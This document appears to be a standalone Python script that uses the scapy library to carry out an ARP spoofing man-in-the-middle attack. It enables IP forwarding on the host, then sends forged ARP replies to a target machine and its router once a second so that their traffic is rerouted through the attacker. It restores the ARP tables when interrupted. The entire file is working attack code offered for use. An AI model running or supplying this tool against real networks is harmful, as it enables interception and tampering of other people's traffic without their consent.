#!/usr/bin/env python

import scapy.all as scapy
import subprocess
import time
import argparse

def parse_arguments():
    parser = argparse.ArgumentParser()
    parser.add_argument("-t", "--target", dest="target_ip", help="Target IP address for the ARP spoof attack")
    parser.add_argument("-r", "--router", dest="router_ip", help="IP address of the router/gateway")
    options = parser.parse_args()
    if options.target_ip:
        if options.router_ip:
            return options
        else:
            parser.error("Router IP not specified, use -h for more info.")
    else:
        parser.error("Target IP not specified, use -h for more info.")

def get_mac(ip):
    arp_request = scapy.ARP(pdst=ip)
    broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
    arp_request_frame = broadcast/arp_request
    ans_list = scapy.srp(arp_request_frame, timeout=1, verbose=False)[0]
    mac = ans_list[0][1].hwsrc
    return mac

def arp_spoof(victim_ip, spoofed_ip):
    victim_mac = get_mac(victim_ip)
    arp = scapy.ARP(op=2, pdst=victim_ip, hwdst=victim_mac, psrc=spoofed_ip)
    ethernet = scapy.Ether(dst=victim_mac)
    arp_spoof_packet = ethernet/arp
    scapy.sendp(arp_spoof_packet, verbose=False)

def restore(dest_ip, source_ip):
    dest_mac = get_mac(dest_ip)
    source_mac = get_mac(source_ip)
    arp = scapy.ARP(op=2, pdst=dest_ip, hwdst=dest_mac, psrc=source_ip, hwsrc=source_mac)
    ethernet = scapy.Ether(dst=dest_mac)
    arp_restore_packet = ethernet/arp
    scapy.sendp(arp_restore_packet, verbose=False, count=4)

options_list = parse_arguments()

target_ip = options_list.target_ip
router_ip = options_list.router_ip

subprocess.run("echo 1 > /proc/sys/net/ipv4/ip_forward", shell=True, check=True)

sent_packets = 0

try:
    while True:
        arp_spoof(target_ip, router_ip)
        arp_spoof(router_ip, target_ip)
        sent_packets+=2
        print(f"\r[+] Sent {sent_packets} packets", end="")
        time.sleep(1)
except KeyboardInterrupt:
    print("\n[-] Detected Ctrl + C  -->  Quitting")
    restore(target_ip, router_ip)
    restore(router_ip, target_ip)
    print("[+] ARP Tables restored")
